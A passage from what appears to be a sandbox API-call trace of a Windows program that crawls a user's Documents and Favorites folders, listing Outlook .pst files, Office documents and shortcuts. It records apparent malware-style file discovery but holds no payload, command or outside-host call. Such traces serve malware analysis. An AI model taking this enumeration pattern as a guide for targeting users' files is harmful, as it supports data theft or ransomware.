nFileSizeHigh=0x0, nFileSizeLow=0x17d32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="krTqwdJtX5sPV.wav", cAlternateFileName="KRTQWD~1.WAV")) returned 0xffffffff [0209.955] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0209.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0209.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.955] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.955] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.955] PathFindFileNameW (pszPath="") returned="" [0209.955] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a324520, ftCreationTime.dwHighDateTime=0x1d5e512, ftLastAccessTime.dwLowDateTime=0x5c7a59e0, ftLastAccessTime.dwHighDateTime=0x1d5deca, ftLastWriteTime.dwLowDateTime=0x5c7a59e0, ftLastWriteTime.dwHighDateTime=0x1d5deca, nFileSizeHigh=0x0, nFileSizeLow=0x17d32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="krTqwdJtX5sPV.wav", cAlternateFileName="KRTQWD~1.WAV")) returned 0xffffffff [0209.955] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0209.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0209.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.956] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.956] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.956] PathFindFileNameW (pszPath="") returned="" [0209.956] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.957] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.957] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.957] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0209.957] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0209.957] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0209.957] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.957] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.957] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0209.957] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0209.957] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.957] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.957] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.958] PathFindFileNameW (pszPath="") returned="" [0209.958] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0209.958] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.958] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0209.958] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0209.958] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.958] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.958] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.958] PathFindFileNameW (pszPath="") returned="" [0209.958] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.959] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.959] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0209.959] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0209.959] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.960] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.960] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\") returned="y5VbixHYeFSBUXkYrU1j\\" [0209.960] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0209.960] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.960] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.960] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.960] PathFindFileNameW (pszPath="") returned="" [0209.960] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e062460, ftCreationTime.dwHighDateTime=0x1d5dfa4, ftLastAccessTime.dwLowDateTime=0xcc0be400, ftLastAccessTime.dwHighDateTime=0x1d5dd93, ftLastWriteTime.dwLowDateTime=0xcc0be400, ftLastWriteTime.dwHighDateTime=0x1d5dd93, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.962] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e062460, ftCreationTime.dwHighDateTime=0x1d5dfa4, ftLastAccessTime.dwLowDateTime=0xcc0be400, ftLastAccessTime.dwHighDateTime=0x1d5dd93, ftLastWriteTime.dwLowDateTime=0xcc0be400, ftLastWriteTime.dwHighDateTime=0x1d5dd93, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.962] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9d89230, ftCreationTime.dwHighDateTime=0x1d5d987, ftLastAccessTime.dwLowDateTime=0xe5fa3430, ftLastAccessTime.dwHighDateTime=0x1d5e611, ftLastWriteTime.dwLowDateTime=0xe5fa3430, ftLastWriteTime.dwHighDateTime=0x1d5e611, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4qvrM0-cLvTuNo", cAlternateFileName="4QVRM0~1")) returned 1 [0209.962] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14c34210, ftCreationTime.dwHighDateTime=0x1d5e0b9, ftLastAccessTime.dwLowDateTime=0x4099ae10, ftLastAccessTime.dwHighDateTime=0x1d5dee8, ftLastWriteTime.dwLowDateTime=0x4099ae10, ftLastWriteTime.dwHighDateTime=0x1d5dee8, nFileSizeHigh=0x0, nFileSizeLow=0xeb4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bC__N8aqJQNDm1AKj8.ppt", cAlternateFileName="BC__N8~1.PPT")) returned 1 [0209.962] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x396d8f60, ftCreationTime.dwHighDateTime=0x1d5e6dd, ftLastAccessTime.dwLowDateTime=0xb0ffc9e0, ftLastAccessTime.dwHighDateTime=0x1d5d859, ftLastWriteTime.dwLowDateTime=0xb0ffc9e0, ftLastWriteTime.dwHighDateTime=0x1d5d859, nFileSizeHigh=0x0, nFileSizeLow=0x15650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L3qVD2UVF4ROD.rtf", cAlternateFileName="L3QVD2~1.RTF")) returned 1 [0209.962] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e6a9ed0, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0x1ac016d0, ftLastAccessTime.dwHighDateTime=0x1d5de1a, ftLastWriteTime.dwLowDateTime=0x1ac016d0, ftLastWriteTime.dwHighDateTime=0x1d5de1a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lMexzd9nHZj622T267Je", cAlternateFileName="LMEXZD~1")) returned 1 [0209.962] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0a266e0, ftCreationTime.dwHighDateTime=0x1d5e1b0, ftLastAccessTime.dwLowDateTime=0x9d758200, ftLastAccessTime.dwHighDateTime=0x1d5d9f0, ftLastWriteTime.dwLowDateTime=0x9d758200, ftLastWriteTime.dwHighDateTime=0x1d5d9f0, nFileSizeHigh=0x0, nFileSizeLow=0x15dcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Nd7 afWsG.docx", cAlternateFileName="ND7AFW~1.DOC")) returned 1 [0209.962] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfba34520, ftCreationTime.dwHighDateTime=0x1d5d88c, ftLastAccessTime.dwLowDateTime=0x84098ec0, ftLastAccessTime.dwHighDateTime=0x1d5e74b, ftLastWriteTime.dwLowDateTime=0x84098ec0, ftLastWriteTime.dwHighDateTime=0x1d5e74b, nFileSizeHigh=0x0, nFileSizeLow=0xe8bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tGmp.rtf", cAlternateFileName="")) returned 1 [0209.962] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xada38390, ftCreationTime.dwHighDateTime=0x1d5dc4b, ftLastAccessTime.dwLowDateTime=0xc052cce0, ftLastAccessTime.dwHighDateTime=0x1d5dbf5, ftLastWriteTime.dwLowDateTime=0xc052cce0, ftLastWriteTime.dwHighDateTime=0x1d5dbf5, nFileSizeHigh=0x0, nFileSizeLow=0x134f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="umeOOZ0__QYx.xls", cAlternateFileName="UMEOOZ~1.XLS")) returned 1 [0209.962] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf1afe70, ftCreationTime.dwHighDateTime=0x1d5e0fe, ftLastAccessTime.dwLowDateTime=0xf27b6ec0, ftLastAccessTime.dwHighDateTime=0x1d5de16, ftLastWriteTime.dwLowDateTime=0xf27b6ec0, ftLastWriteTime.dwHighDateTime=0x1d5de16, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zwRzh", cAlternateFileName="")) returned 1 [0209.963] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf1afe70, ftCreationTime.dwHighDateTime=0x1d5e0fe, ftLastAccessTime.dwLowDateTime=0xf27b6ec0, ftLastAccessTime.dwHighDateTime=0x1d5de16, ftLastWriteTime.dwLowDateTime=0xf27b6ec0, ftLastWriteTime.dwHighDateTime=0x1d5de16, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zwRzh", cAlternateFileName="")) returned 0 [0209.963] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.964] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.964] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0209.964] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0209.964] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.964] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.964] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.964] PathFindFileNameW (pszPath="") returned="" [0209.964] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.964] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.964] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.964] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0209.964] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0209.964] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0209.965] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.965] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.965] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0209.965] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0209.965] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.965] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.965] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.965] PathFindFileNameW (pszPath="") returned="" [0209.965] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.967] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.967] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0209.967] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0209.967] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0209.967] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0209.967] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: 